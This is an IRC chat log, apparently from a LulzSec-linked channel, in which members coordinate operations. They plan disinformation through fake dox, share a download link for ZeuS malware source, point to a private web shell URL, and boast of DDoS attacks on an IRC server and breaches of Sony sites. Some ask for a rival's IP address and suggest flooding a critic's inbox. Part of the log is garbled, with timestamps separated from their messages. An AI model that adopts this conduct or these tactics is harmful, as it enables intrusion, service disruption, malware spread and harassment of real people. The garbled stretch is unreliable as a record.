12:25:50 <neuron> :E Jun 04 12:25:53 <Sabu> topiary generate me a new donation key so I put on topic of lulzsec chan on lulzco network Jun 04 12:26:05 <Topiary> let's just use the same one bro Jun 04 12:26:26 <Sabu> im lazy lo Jun 04 12:26:27 * neuron will be in that lulzco channel has BlackBeard Jun 04 12:26:28 <Sabu> which one is it? Jun 04 12:26:30 <Topiary> sec Jun 04 12:26:33 <Sabu> neuron Jun 04 12:26:38 <Sabu> remember what happened with 2600 Jun 04 12:26:46 <neuron> I didn't have aproblem in 2600 Jun 04 12:26:47 <Sabu> you got to be on point if I op you Jun 04 12:26:48 <Topiary> http://lulzsecurity.com/donate/ Jun 04 12:26:52 <Topiary> just put this in the topic Jun 04 12:26:54 <Topiary> <3 Jun 04 12:26:57 <neuron> I will be Jun 04 12:27:04 <Topiary> Sabu: want me to head over? Jun 04 12:29:52 <neuron> Sabu: Ill be careful Jun 04 12:31:38 <joepie91> it's best to sit on bitcoins as long as possible Jun 04 12:31:39 <joepie91> imo

Jun 04 12:31:48 <joepie91> they are pretty much guaranteed to go further up Jun 04 12:31:51 <joepie91> in the future Jun 04 12:31:53 <lol> untill they hatch! :) Jun 04 12:32:06 <joepie91> it's pretty much a deflationary currency, not in flationary Jun 04 12:32:29 <joepie91> butbutbut Jun 04 12:32:31 <joepie91> gotta go somewhere Jun 04 12:32:33 <joepie91> for a sec Jun 04 12:33:04 <Sabu> guys Jun 04 12:33:13 <Sabu> if you head over we have much more ocntrol than on 2600 Jun 04 12:33:18 <Sabu> so use your pseudonyms Jun 04 12:33:29 <Sabu> and lol @ faggotry on here Jun 04 12:33:40 <Sabu> register your nicks and tell me them Jun 04 12:33:49 <tflow> bottle_of_rum Jun 04 12:33:59 <neuron> Registeered BlackBeard Jun 04 12:37:14 <joepie91> Sabu: isn't it Ryans IRC...? Jun 04 12:39:18 <Sabu> 08:37 <Lulzsupport> dude check this :) http://www.megaup load.com/?d=0H302G70 Jun 04 12:39:19 <Sabu> 08:37 <Lulzsupport> but do not spread use for your purpo ses ;) Jun 04 12:39:24 <Sabu> check whats about? Jun 04 12:39:37 <neuron> mn ? Jun 04 12:39:49 <Sabu> 08:38 <Lulzsupport> [was to give it to captainjack yeste rday but i lost him so i didn't have the time to give him the stuff]:) Jun 04 12:39:52 <Sabu> 08:38 <Lulzsupport> nope friend but wanna help ;) Jun 04 12:39:53 <Sabu> on your vm Jun 04 12:39:55 <Sabu> 08:38 <Lulzsupport> check and you say me :) Jun 04 12:39:56 <Sabu> download that megaupoad Jun 04 12:39:59 <Sabu> 08:38 <Lulzsupport> [the directory issue] its for mantec h.com :) Jun 04 12:40:01 <Sabu> neuron Jun 04 12:40:02 <neuron> Rgr Jun 04 12:40:04 <Sabu> see wtf is in it Jun 04 12:40:42 <lol> becarefull, if it's pdf's or things like tht Jun 04 12:40:52 <lol> open it on a virtual machine Jun 04 12:41:00 <neuron> Yeah Jun 04 12:41:11 <lol> incase it exploits your pdf viwer or w/e filetype it is Jun 04 12:41:35 <Sabu> yeah Jun 04 12:41:38 <Sabu> neuron be on point Jun 04 12:41:47 <Sabu> make sure your vm is behind vpn etc Jun 04 12:41:50 <Sabu> so your ip isnt exposed Jun 04 12:43:48 <lol> Dont mention nothing private in PM either Jun 04 12:43:52 <lol> to no one Jun 04 12:43:56 <lol> not even our members Jun 04 12:43:56 <Sabu> guys Jun 04 12:43:58 <Sabu> everyone Jun 04 12:44:00 <Sabu> talk here Jun 04 12:44:01 <lol> just incase PM's are logged Jun 04 12:44:04 <Sabu> yup Jun 04 12:44:08 <joepie91> is it Ryans IRC or not? Jun 04 12:44:10 <Sabu> I'm there already established Jun 04 12:44:16 <Sabu> JOEPIE YES IT IS ED IRC NETWORK Jun 04 12:44:21 <Sabu> HE CHANGED IT TO LULZCO NETWORK Jun 04 12:44:24 <neuron> XD Jun 04 12:44:26 <joepie91> ah Jun 04 12:44:27 <joepie91> there Jun 04 12:44:29 <Sabu> ok Jun 04 12:44:30 <neuron> Sabu: im there just waiting for ops Jun 04 12:44:30 <joepie91> that was what I was wondering about. Jun 04 12:44:31 <joepie91> lol

Jun 04 12:44:34 <Sabu> lol Jun 04 12:44:35 <Sabu> ok Jun 04 12:44:38 <Sabu> before I start opping etc Jun 04 12:44:38 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pur e-elite Jun 04 12:44:42 <Sabu> make sure you guys are on point Jun 04 12:44:44 <neuron> o/ pwnsauce Jun 04 12:44:44 <lol> pwnsauce :D Jun 04 12:44:48 <Sabu> if you get any docs / links in pm Jun 04 12:44:50 <Sabu> paste here Jun 04 12:44:55 <Sabu> we'll anallyze together Jun 04 12:44:58 <pwnsauce> Yo Jun 04 12:45:00 <Sabu> no answering questions at all Jun 04 12:45:03 <pwnsauce> whats happening? Jun 04 12:45:05 <Sabu> no drama dont get trolled Jun 04 12:45:06 <Sabu> pwnsauce nothing Jun 04 12:45:07 <Sabu> just bored Jun 04 12:45:08 <Sabu> you? Jun 04 12:45:13 <pwnsauce> Just got online Jun 04 12:45:16 <pwnsauce> got some idead Jun 04 12:45:19 <pwnsauce> *ideas Jun 04 12:45:33 <joepie91> if someone feels like trolling Awinee some more, here is an excellent opportunity Jun 04 12:45:34 <joepie91> <Awinee>asie, I wouldn't wanna hack CP sites. Jun 04 12:45:34 <joepie91> <Awinee>just ddos them Jun 04 12:45:34 <joepie91> <asie>Awinee why not? Jun 04 12:45:34 <joepie91> <Awinee>hacking them would involve possibly seei ng the pictures Jun 04 12:45:52 <neuron> lol Jun 04 12:46:04 <pwnsauce> lol Jun 04 12:46:12 <Sabu> HAHA Jun 04 12:46:17 <joepie91> you know what they say about extreme denial.. .: D Jun 04 12:46:22 <Sabu> ok who is on here now ? Jun 04 12:46:28 <Sabu> the lulzco server Jun 04 12:47:09 <neuron> o/ Has BlackBeard Jun 04 12:50:32 * trollpoll (rootgratz@HA-s5h.ho4.fu85s5.IP) has joined #p ure-elite Jun 04 12:50:59 * tflow_ (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pur e-elite Jun 04 12:52:25 * tflow has quit (Ping timeout: 121 seconds) Jun 04 12:52:32 * tflow_ is now known as tflow Jun 04 12:55:08 <neuron> lol: Lets see there is a pdf,ppt,xls..hhaha Jun 04 12:58:17 <neuron> Sabu.. im not seeing anything really "whoop" in this Jun 04 12:58:26 <Sabu> ok Jun 04 12:58:59 <neuron> :( im the only opless guy in there *crys* Jun 04 13:03:32 <trollpoll> ill be back Jun 04 13:03:35 * trollpoll has quit (Quit: Leaving) Jun 04 13:03:45 <pwnsauce> trollpoll is... THE TERMINATOR! Jun 04 13:04:14 <neuron> Sabu: None of this can help us. This was suppose d to be information to help us take down mantech but Jun 04 13:04:17 <Topiary> neuron, we're trying to hide our numbers and shi t, we don't want more people being d0x'd Jun 04 13:04:28 <Topiary> on the other chan Jun 04 13:04:30 <neuron> Topiary: Understandable Jun 04 13:04:46 <Topiary> see the nicks that are OP'd now are assuming fak e personas Jun 04 13:04:50 <Topiary> because we leaked fake dox Jun 04 13:05:02 <Topiary> we're diverting attention from our real nicks an

d Anonymous Jun 04 13:06:59 <neuron> Sabu: that zip contains a useless ad dump, email address *maybe useful*, A random nasa forcasting ppt from 2009, and a DoD biome tric ppt Jun 04 13:07:45 <Sabu> ok Jun 04 13:07:49 <Sabu> thanks neuron Jun 04 13:07:51 <Sabu> good work brother Jun 04 13:07:54 <Sabu> fuck i gotta shit so hard Jun 04 13:07:55 <Sabu> brb Jun 04 13:08:18 <neuron> Thats sexy Jun 04 13:12:27 <pwnsauce> ZeuS source code for all! http://www.mediafire.c om/?o5v9ezj7lyme85t Jun 04 13:12:32 <pwnsauce> (sharing) Jun 04 13:13:58 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 13:15:10 * Topiary has quit (Quit: Leaving) Jun 04 13:16:59 <neuron> Wow people are really throwing bitcoin to lulzse c XD Jun 04 13:18:28 <pwnsauce> how many we got? Jun 04 13:18:29 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elit e Jun 04 13:18:32 <Sabu> guys Jun 04 13:18:35 <Sabu> http://www.youtube.com/watch?v=a23T8rl1sek Jun 04 13:18:36 <neuron> 26 Jun 04 13:18:39 <Sabu> these guys just contacted me privately Jun 04 13:18:43 <pwnsauce> aye? Jun 04 13:18:52 <Sabu> they disrupt national nazi parties Jun 04 13:18:57 <Sabu> ook at how they fight the ns88 Jun 04 13:19:18 <tflow> what did they say? Jun 04 13:19:55 <tflow> lolwow Jun 04 13:20:34 <Sabu> dude Jun 04 13:20:38 <Sabu> they straight up fuck them nazis up hahaha Jun 04 13:23:02 <neuron> lol fuck Jun 04 13:34:53 <storm> rofl Jun 04 13:38:30 <neuron> thats pretyt crazy Jun 04 13:38:31 <neuron> o/ storm Jun 04 13:39:35 <pwnsauce> storm :D Jun 04 13:40:44 <storm> yooo Jun 04 13:40:59 <storm> sup neuron pwnsauce Jun 04 13:41:39 <pwnsauce> sup :D Jun 04 13:41:43 <pwnsauce> storm - rootkits? Jun 04 13:44:13 <neuron> brb Jun 04 13:44:14 <storm> you never got it? Jun 04 13:44:19 <storm> I gave it to neuron Jun 04 13:45:17 <storm> lmk where you want it uploaded Jun 04 13:45:28 <storm> I'd prefer a shell with scp though. Jun 04 13:45:30 <storm> :P Jun 04 13:51:32 <pwnsauce> storm - use whoami.cer33.com/fun/shell.php Jun 04 13:51:37 <pwnsauce> its the web interface Jun 04 13:51:46 <pwnsauce> all it good for is uploading/downloading shit Jun 04 13:51:49 <Sabu> https://pastee.org/zj3mm "not done" is the pssword Jun 04 13:51:53 <Sabu> tell me what you guys think Jun 04 13:51:53 <pwnsauce> ill wget it later :) Jun 04 13:51:56 <Sabu> reviving antisec Jun 04 13:52:17 <pwnsauce> Savu Jun 04 13:52:20 <pwnsauce> *Sabu Jun 04 13:52:24 <pwnsauce> u dun goofed Jun 04 13:52:27 <pwnsauce> no password needed Jun 04 13:52:28 <pwnsauce> :/ Jun 04 13:53:25 <pwnsauce> or maybe im just that 1337 that it didnt ask for

one... Jun 04 13:54:03 Jun 04 13:54:05 Jun 04 13:54:06 Jun 04 13:54:33 Jun 04 13:54:37 Jun 04 13:54:48 Jun 04 13:54:55 Jun 04 13:55:12 Jun 04 13:55:17 Jun 04 13:55:18 Jun 04 13:55:20 Jun 04 13:55:27 Jun 04 13:58:15 Jun 04 13:58:19 Jun 04 13:58:21 Jun 04 13:58:26 Jun 04 13:58:32 Jun 04 13:58:39 Jun 04 13:59:04 Jun 04 13:59:17 Jun 04 14:00:35 Jun 04 14:18:34 Jun 04 14:19:32 Jun 04 14:19:32 Jun 04 14:19:35 Jun 04 14:19:36 Jun 04 14:19:37 Jun 04 14:21:27 Jun 04 14:21:39 Jun 04 14:23:42 Jun 04 14:24:37 ure-elite Jun 04 14:25:27 Jun 04 14:25:28 Jun 04 14:25:30 Jun 04 14:25:30 Jun 04 14:25:32 Jun 04 14:25:34 Jun 04 14:26:03 Jun 04 14:27:02 Jun 04 14:27:05 Jun 04 14:27:17 Jun 04 14:27:27 Jun 04 14:27:56 Jun 04 14:28:32 Jun 04 14:28:35 Jun 04 14:28:59 Jun 04 14:29:54 Jun 04 14:29:57 Jun 04 14:30:03 Jun 04 14:30:29 Jun 04 14:30:39 Jun 04 14:30:49 Jun 04 14:30:54 Jun 04 14:31:00 Jun 04 14:31:10 Jun 04 14:32:27 Jun 04 14:32:33 Jun 04 14:32:43

<storm> lol <storm> yeah <storm> no pass <storm> pwnsauce: i don't haz a vpn to go to such webshells <storm> :x <Sabu> oh its ok not public dont think <Sabu> storm I can give oyu one fgt <pwnsauce> storm - thats my priv8 webll she <pwnsauce> *priv8 shell <pwnsauce> as in <pwnsauce> I control it <storm> oh i see <storm> rofl <storm> im dropping an efnet server <storm> with ease <storm> fucking funny <storm> 4 100mbps spoofers <storm> bitch is getting tore the fuck up <pwnsauce> hahahahhaaha <storm> pwnsauce: 1 sec <storm> k check pm <storm> who the fk is leon <Sabu> ITS ME <Sabu> DICK <storm> lol <storm> op me <storm> :D <Sabu> what nick? <storm> voodoo ofc <storm> looks like bots are joining * trollpoll (trollpoll@HA-4pn.f1d.en4ulv.IP) has joined #p <Sabu> storm <neuron> back <Sabu> hande dem bots <storm> yo <storm> k <Sabu> gave you ops <neuron> back o/ <Sabu> sup <Sabu> hi trollpol :D <trollpoll> hi bro <trollpoll> ill be here but idle.. <neuron> Sabu: whats going on latley? <Sabu> ok troll <3 <Sabu> neuron everythings ok <neuron> lulzcov = our disinformation campaign? <Sabu> what? <Sabu> lulzcov? <neuron> the other server <neuron> someone ddos this guy <storm> i dunno what ips hes using * io (egfaby@HA-umf.f9m.2dndkn.IP) has joined #pure-elite <neuron> o/ io <io> heya fellow swashbucklers <neuron> hi io don't think we have ever meet <pwnsauce> io is an old "one of us" :D <io> maybe not, maybe we did. doesnt matter :) <io> sec brb

Jun 04 14:32:44 Jun 04 14:34:03 Jun 04 14:34:10 Jun 04 14:34:15 Jun 04 14:34:16 Jun 04 14:34:16 Jun 04 14:34:24 Jun 04 14:34:25 Jun 04 14:34:26 ce forever Jun 04 14:34:38 well Jun 04 14:34:56 n ddosing me in Jun 04 14:35:00 Jun 04 14:35:02 Jun 04 14:35:08 IP" Jun 04 14:35:15 Jun 04 14:35:50 ht now Jun 04 14:35:51 Jun 04 14:36:04 Jun 04 14:36:04 Jun 04 14:36:04 Jun 04 14:36:05 Jun 04 14:36:09 Jun 04 14:36:12 Jun 04 14:37:00 Jun 04 14:37:06 Jun 04 14:40:06 Jun 04 14:40:11 Jun 04 14:40:12 Jun 04 14:40:17 Jun 04 14:40:17 Jun 04 14:40:18 Jun 04 14:40:25 Jun 04 14:40:27 Jun 04 14:40:30 Jun 04 14:40:32 Jun 04 14:40:39 Jun 04 14:40:47 Jun 04 14:41:06 Jun 04 14:41:15 Jun 04 14:41:18 Jun 04 14:41:28 Jun 04 14:41:43 Jun 04 14:42:08 Jun 04 14:42:08 Jun 04 14:42:08 Jun 04 14:42:08 Jun 04 14:42:08 Jun 04 14:42:08 Jun 04 14:43:17 Jun 04 14:43:18 Jun 04 14:43:20 Jun 04 14:43:25 Jun 04 14:43:26 Jun 04 14:43:34 Jun 04 14:43:37

<neuron> OOOO <storm> lol joepie91 <storm> always on your realname <joepie91> don't op me kthx <joepie91> ye <joepie91> I know <storm> I'm not opping anyone <storm> ;p <joepie91> I've been lurking on there from anonnews vps sin <joepie91> <joepie91> a triggerhappy <joepie91> <joepie91> <joepie91> <joepie91> <joepie91> just decided to join there from normal client as I was joining from the anonnews vps to avoid Rya mood and indeed a few hours later "you clever bastard, you know I can't ddos that (from Ryan in PM) buuuut I don't think Ryan is as triggerhappy rig

<joepie91> so meh <storm> WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network) <storm> ircname : The Prez <storm> channels : #lulzsec +##lulzsec <storm> ROFL <storm> ##lulzsec <neuron> lol <joepie91> Sabu <joepie91> you mentioned an antifa group? <Sabu> what? <storm> pft <storm> wtf <storm> JackSparrow's script <storm> is <storm> shit <io> lulz <neuron> lol <storm> serious <storm> absolute shit <neuron> Bwhaha he kicked a mod awesome <storm> i cant get in cause kayla set +R <io> try now <io> ugh <io> clones back. <Sabu> sigh <storm> kline them <joepie91> <Sabu>they disrupt national nazi parties <joepie91> <Sabu>ook at how they fight the ns88 <joepie91> <tflow>what did they say? <joepie91> <tflow>lolwow <joepie91> <Sabu>dude <joepie91> <Sabu>they straight up fuck them nazis up hahaha <Sabu> yeah joepie <lol> i didn't set +R :s <Sabu> that guy <storm> get me ops back XD <Sabu> part of anti-ns88 movement <Sabu> they got a big anarchy group <Sabu> that fights nazis

Jun 04 14:43:56 <joepie91> do they have a name? Jun 04 14:44:00 <joepie91> like Jun 04 14:44:01 <joepie91> group name Jun 04 14:44:15 <joepie91> I might be able to ask around a bit and figure o ut if anyone knows anyting about them and/or their reputation Jun 04 14:44:35 <io> <Ryan> /msg botserv badwords #lulzsec add irc.hardchats .com Jun 04 14:44:35 <io> >botserv< badwords #lulzsec add irc.hardchats.com Jun 04 14:44:35 <io> -BotServ- irc.hardchats.com added to #lulzsec bad words list. Jun 04 14:44:35 <io> <buccaneer> done, thx Jun 04 14:44:35 <io> <Ryan> i turned dontkickops on too so voodoo wont get ki cked again Jun 04 14:45:33 <storm> thanks Jun 04 14:45:36 <storm> :D Jun 04 14:45:47 <Sabu> ryan doesnt know any of you are involved Jun 04 14:45:48 <storm> it won't work till I'm opped though >;x Jun 04 14:46:09 * tflow has quit (A TLS packet with unexpected length was received.) Jun 04 14:46:32 * tflow (bottle_of_@HA-r12.0jd.4c0nch.IP) has joined #pure -elite Jun 04 14:47:18 <io> Sabu, didn't talk to him any further and won't. Jun 04 14:47:54 <storm> we need a v6 server Jun 04 14:47:57 <storm> fosho Jun 04 14:48:20 <storm> WooF (h@LulzCo-552A80F8.hsd1.ma.comcast.net) (Network) Jun 04 14:48:25 <storm> someone gimme his ip Jun 04 14:48:26 <storm> lmao Jun 04 14:48:33 <storm> ill piss him off by taking his nick Jun 04 14:53:44 * Topiary (t@HA-iag.hpg.3uomjh.IP) has joined #pure-elite Jun 04 14:53:55 <neuron> brb Jun 04 14:53:57 * neuron has quit (Quit: leaving) Jun 04 14:56:45 <storm> anyone? Jun 04 14:57:41 <joepie91> eh Jun 04 14:57:44 <joepie91> how should we give his IP? Jun 04 14:58:32 <storm> opers Jun 04 14:58:36 <storm> should see ips Jun 04 14:58:50 * neuron (neuron@HA-cm6.345.a84vd3.IP) has joined #pure-el ite Jun 04 14:58:59 <neuron> back o/ Jun 04 15:01:13 <joepie91> who... are an oper on ED IRC? Jun 04 15:03:17 <joepie91> also, Topiary: http://twitter.com/#!/AnotherBron y/status/77049413146648577 Jun 04 15:10:00 <lol> please guys, dont open anything these people on #lulzsec give you, more than likely it has a 0day in it to own you Jun 04 15:10:08 <lol> these people are giving you things for a reason Jun 04 15:10:58 <neuron> Aye :p like that rar i got containing.. a .xls , .ppt, .doc, pdf... Jun 04 15:11:00 <neuron> XD Jun 04 15:11:13 <neuron> all useless info Jun 04 15:11:35 <storm> lol. Jun 04 15:11:59 <lol> neuron did you open it on a VM? Jun 04 15:12:36 <storm> gtg guys Jun 04 15:12:38 <storm> ill bbl Jun 04 15:12:42 <lol> bye storm <3 :) Jun 04 15:12:43 <storm> someone gimme woofs ip Jun 04 15:12:43 <joepie91> http://jadedsecurity.net/2011/06/04/who-is-to-bl ame-for-the-success-of-the-latest-round-of-attacks/ Jun 04 15:12:45 <storm> <3 :D Jun 04 15:13:09 <joepie91> also, best way is still to have a completely iso lated machine

Jun 04 15:13:17 <joepie91> with the actual network cable unplugged Jun 04 15:13:23 <joepie91> to open your shit on Jun 04 15:13:28 <joepie91> can't break out of a physical machine :D Jun 04 15:14:02 <neuron> vm :P cause you can nuke it Jun 04 15:18:09 <joepie91> vm inside physical machine Jun 04 15:18:16 <joepie91> reinstall OS on physical machine Jun 04 15:18:24 <joepie91> to "nuke" it :P Jun 04 15:18:33 <joepie91> anyhow, read that article Jun 04 15:22:43 <joepie91> "Slashdot has so many gurus meditating, the enti re damn datacenter had better be levitating a mile off the ground." Jun 04 15:33:40 <neuron> \o/ we have a $10,000 Bounty http://www.youtube. com/watch?v=RcsJW7Ah-Ho Jun 04 15:34:00 <neuron> Apperently im a piece of crap... XD Jun 04 15:34:19 <pwnsauce> :D Jun 04 15:34:22 <pwnsauce> LOL Jun 04 15:34:29 <neuron> watch it lol Jun 04 15:34:34 <neuron> we should flood his inbox for the lulz Jun 04 15:36:03 <pwnsauce> will do Jun 04 15:36:09 <pwnsauce> once I free soe band width Jun 04 15:36:13 <neuron> :D Jun 04 15:36:14 <pwnsauce> you know what my connections like Jun 04 15:36:21 <neuron> lol you can use my shell :P Jun 04 15:36:51 <joepie91> lol he mad Jun 04 15:36:58 <joepie91> he so mad Jun 04 15:37:18 <neuron> Sabu: Watch that video Jun 04 15:37:47 <Sabu> I did Jun 04 15:38:22 <pwnsauce> lulz Jun 04 15:38:56 <joepie91> lol just wow Jun 04 15:39:09 <joepie91> sony fanboys putting a bounty on lulzsec... Jun 04 15:39:11 <neuron> lol How many voice interview was Topiary involve d in :p every time i watch a new interview its tops voice haha Jun 04 15:39:57 <Topiary> blame Westboro Batshit Church Jun 04 15:40:23 <neuron> http://www.youtube.com/watch?v=0UmdcNqZmw8 << Jun 04 15:42:12 <joepie91> did kevin mitnick Jun 04 15:42:13 <joepie91> just tweet Jun 04 15:42:15 <Topiary> my shit was about to get raped so hard via DDoS and I didn't want to spend 3 minutes getting back in, so I quickly switched VPNs Jun 04 15:42:16 <joepie91> the dox Jun 04 15:42:18 <Topiary> @ that interview Jun 04 15:42:24 <tflow> yes Jun 04 15:42:27 <tflow> he's a tool Jun 04 15:42:27 <joepie91> lol. Jun 04 15:42:43 <tflow> i can't believe they would believe an fbi-informant woul d hack the bi Jun 04 15:42:45 <tflow> fbi* Jun 04 15:42:47 <neuron> lol Topiary how many interviews did you do :P i like to hear them question you Jun 04 15:42:59 <Topiary> just that one and the other one really Jun 04 15:43:12 <joepie91> also what is lulzsec.net Jun 04 15:43:51 <tflow> no idea, it looks like ryan's doing Jun 04 15:43:53 * neuron claps Jun 04 15:44:09 <tflow> he also registered lulzsec.org Jun 04 15:45:52 <neuron> lol this is the first time i saw the leaked dox Jun 04 15:46:22 <Topiary> kayla and I wrote it Jun 04 15:46:24 <Topiary> pretty good huh Jun 04 15:46:57 <neuron> Yeah i like them. Kevin mitnick retwitt makes it even better Jun 04 15:47:28 <io> oh they're from us? thought someone was really that moro nic heh Jun 04 15:48:00 * joepie91 checks whois for lulzsec.org/net

Jun 04 15:53:18 <tflow> but yeah Jun 04 15:53:26 <tflow> no way i#m trusting ryan with any domain Jun 04 15:53:31 <tflow> after what he did to anonops Jun 04 15:53:35 <tflow> domains Jun 04 15:53:35 <pwnsauce> aye Jun 04 15:56:09 <neuron> what did he do? *i was never in the anonops loop * Jun 04 15:56:28 <joepie91> jacked anonops domains Jun 04 15:56:32 <joepie91> ddosed the network Jun 04 15:56:36 <joepie91> basically hostile takeover Jun 04 15:56:41 <joepie91> followed by trying to fuck it up Jun 04 15:56:53 <joepie91> but on another note, I should write a fucking sc ript that allows everyone "10 PM credits a day" Jun 04 15:56:57 <joepie91> every time you send me a PM you lose one Jun 04 15:57:00 <joepie91> after 10 PMs you get ignored Jun 04 15:57:07 <neuron> lmfao Jun 04 15:57:11 <joepie91> maybe that fixes the people typing 1 word per li ne in PM Jun 04 15:57:22 <joepie91> and people that start complete random offtopic c onversations while uploading a press release Jun 04 15:57:24 <joepie91> and I'm like Jun 04 15:57:25 <joepie91> DUDE Jun 04 15:57:27 <joepie91> SHUT UP Jun 04 15:57:30 <joepie91> I AM TRYING TO GET WORK DONE Jun 04 15:57:44 <joepie91> like, just ask your question or state your probl em, wait for me to answer, cut all the bullshit and get to the point Jun 04 15:57:45 <joepie91> -_Jun 04 15:58:58 <tflow> https://support.cloudflare.com/discussions/general-chitchat/37-cloudflare-protect-bad-guys-websites Jun 04 15:59:02 <tflow> check that out Jun 04 15:59:02 <tflow> rofl Jun 04 16:00:06 <neuron> thats awesome Jun 04 16:00:33 <tflow> 'CloudFlare does not censor content online, but we do co mply with law enforcement agencies as appropriate.' Jun 04 16:00:40 <tflow> i guess that means handing over ips and stuff Jun 04 16:00:44 <tflow> i'm ok with that Jun 04 16:01:00 <tflow> they can arrest some random brazilian guy with a unsecur ed router Jun 04 16:01:05 <tflow> an* Jun 04 16:01:06 <io> :D Jun 04 16:01:18 <pwnsauce> :D Jun 04 16:01:21 <pwnsauce> LOL :D Jun 04 16:01:58 <Sabu> lolol Jun 04 16:02:46 <joepie91> 2 Posted by KillerKoala on June 03, 2011 @ 07:22 PM Jun 04 16:02:47 <joepie91> You should contact CloudFlare's support team and complain. Jun 04 16:02:48 <joepie91> .. Jun 04 16:02:58 * joepie91 gets annoyed by moralfags who are too lazy and/ or not have balls to do something themselves Jun 04 16:04:58 <joepie91> also, lol Jun 04 16:05:00 <joepie91> cloudflare is really like Jun 04 16:05:04 <joepie91> "ye well, idgaf" Jun 04 16:06:24 <tflow> http://attrition.org/security/rants/sony_aka_sownage.htm l Jun 04 16:06:24 <tflow> http://attrition.org/security/rants/sony_aka_sownage.htm l Jun 04 16:06:25 <tflow> http://attrition.org/security/rants/sony_aka_sownage.htm l Jun 04 16:07:15 <pwnsauce> attrition <3

Jun 04 16:07:27 <joepie91> my god. how can people fail to do something as f ucking simple as uploading a press release Jun 04 16:07:28 <joepie91> like Jun 04 16:07:30 <joepie91> there is a few people Jun 04 16:07:35 <joepie91> that magically have some sort of problem Jun 04 16:07:37 <joepie91> when adding PRs Jun 04 16:07:39 <joepie91> EVERY time Jun 04 16:07:56 <io> "If anyone... ANYONE at all uses the term "advanced pers istent threat" in describing the attacks on Sony, please hit them very hard befo re disregarding them as ignorant charlatans hell-bent on serving their own inter ests." Jun 04 16:07:57 <io> hahaha Jun 04 16:08:11 <joepie91> also, http://pastebin.com/aXLkmNmR Jun 04 16:08:22 <neuron> Hey guys don't you like our recent advanced pers isten attacks on sony ;D Jun 04 16:08:53 <tflow> yeah, i saw joepie91, we rt'd it Jun 04 16:09:02 <tflow> "I was Bored and I play the game of the year : "hacker v s Sony"" Jun 04 16:09:04 <tflow> hilarious Jun 04 16:10:49 <io> yah haha Jun 04 16:11:17 <io> by the timeline score is 2:2 between idahc and lulzsec : p Jun 04 16:11:18 <tflow> certainly is the best game i've played this year Jun 04 16:12:30 <joepie91> lol Jun 04 16:12:32 <joepie91> ya Jun 04 16:12:36 <Topiary> game of the year all years Jun 04 16:12:49 <lol> nah we done 3 or 4 :D Jun 04 16:12:58 <joepie91> like Jun 04 16:12:59 <joepie91> honestly Jun 04 16:13:00 <io> yah iu thought here was some stuff missing Jun 04 16:13:03 <joepie91> it would be best for sony Jun 04 16:13:03 <io> benelux Jun 04 16:13:03 <lol> sonypics, sonyjp, sonybmg and another Jun 04 16:13:06 <joepie91> to just ditch the entire company Jun 04 16:13:10 <joepie91> all their web services Jun 04 16:13:12 <joepie91> everything Jun 04 16:13:16 <joepie91> and just start over from scratch Jun 04 16:13:17 <joepie91> lol Jun 04 16:13:19 <io> working on that, sir. Jun 04 16:13:31 <io> maybe we could do that for them? Jun 04 16:13:37 <joepie91> lolol Jun 04 16:15:34 * storm has quit (Ping timeout: 121 seconds) Jun 04 16:19:47 <joepie91> my god Jun 04 16:19:52 <joepie91> I'm going to fucking disallow JPG uploads Jun 04 16:19:53 <joepie91> on anonnews Jun 04 16:19:59 <joepie91> "yeah but I thought JPG was the best format!" Jun 04 16:20:00 <neuron> lol why Jun 04 16:20:04 <joepie91> because Jun 04 16:20:05 <joepie91> all these PRs Jun 04 16:20:07 <joepie91> are text Jun 04 16:20:08 <joepie91> or vector Jun 04 16:20:13 <joepie91> and are fucking full of artifacts Jun 04 16:20:17 <joepie91> every time someone submits a jpg Jun 04 16:20:21 <trollpoll> nice recopilation of sony hacks Jun 04 16:20:27 <trollpoll> btw hi Jun 04 16:20:36 <joepie91> like, honestly Jun 04 16:20:38 <joepie91> just fucking use PNG Jun 04 16:20:44 <joepie91> it's incredibly small for text and vector Jun 04 16:20:47 <joepie91> with no quality loss Jun 04 16:20:49 <joepie91> also, hai trollpoll

Jun 04 16:21:29 <trollpoll> <lol> sonypics, sonyjp, sonybmg and another Jun 04 16:21:35 <trollpoll> that another is like voldermort Jun 04 16:21:41 <trollpoll> noone wants to name... Jun 04 16:21:44 <joepie91> sony* Jun 04 16:22:55 <trollpoll> so.. whats up sirs? Jun 04 16:23:23 <joepie91> lulz Jun 04 16:23:26 <joepie91> mainly Jun 04 16:23:28 <neuron> lol Jun 04 16:23:36 <neuron> trollpoll: we have a 10k bounty on our heads :) Jun 04 16:23:51 <trollpoll> wtf? Jun 04 16:24:09 <io> once we hit 10 million, i consider turning myself in. Jun 04 16:24:28 <trollpoll> who? Jun 04 16:24:31 <trollpoll> fbi? Jun 04 16:24:34 <io> some sony fanboy Jun 04 16:24:37 <io> nah lol Jun 04 16:24:39 <trollpoll> bah Jun 04 16:24:42 <io> trollZ obviously Jun 04 16:24:49 <neuron> http://www.youtube.com/watch?v=RcsJW7Ah-Ho Jun 04 16:24:54 <joepie91> lesigh Jun 04 16:24:56 <joepie91> http://blitz.uservoice.com/forums/107109-feedbac k/suggestions/1897759-play-nice-with-cloudflare Jun 04 16:24:59 * storm (foolish@HA-n2d.mb1.tkrenp.IP) has joined #pure-el ite Jun 04 16:25:10 <neuron> lol i say we flood his email with dongs and nyan nyan cat Jun 04 16:25:10 <joepie91> in the category of stupid proposals of the day Jun 04 16:25:10 <trollpoll> i use links2 ... i can see youtube now Jun 04 16:25:18 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has left #pureelite Jun 04 16:25:21 <joepie91> blitz Jun 04 16:25:22 <joepie91> pbreit, All requests made by blitz have the X-Po wered-By: blitz.io header. Maybe you can talk to the CloudFlare team to see if t hey use this to ignore the hits and not throttle. You can read more about our au tomatic headers at: http://docs.blitz.io/sprinting/basics Jun 04 16:25:53 <trollpoll> hacking from an amd of more or less 10 years... Jun 04 16:27:52 <joepie91> trollpoll Jun 04 16:27:56 <joepie91> specs? Jun 04 16:28:32 * pwnsauce (pwnsauce@HA-l80.7te.pn6gun.IP) has joined #pur e-elite Jun 04 16:30:44 <trollpoll> shit, im trying to copy paste an d i can... lol Jun 04 16:30:44 <trollpoll> xDDD Jun 04 16:30:57 <pwnsauce> LOL Jun 04 16:31:05 <trollpoll> AMD-K6(tm)-III Processor Jun 04 16:31:13 <trollpoll> Mhz 551 Jun 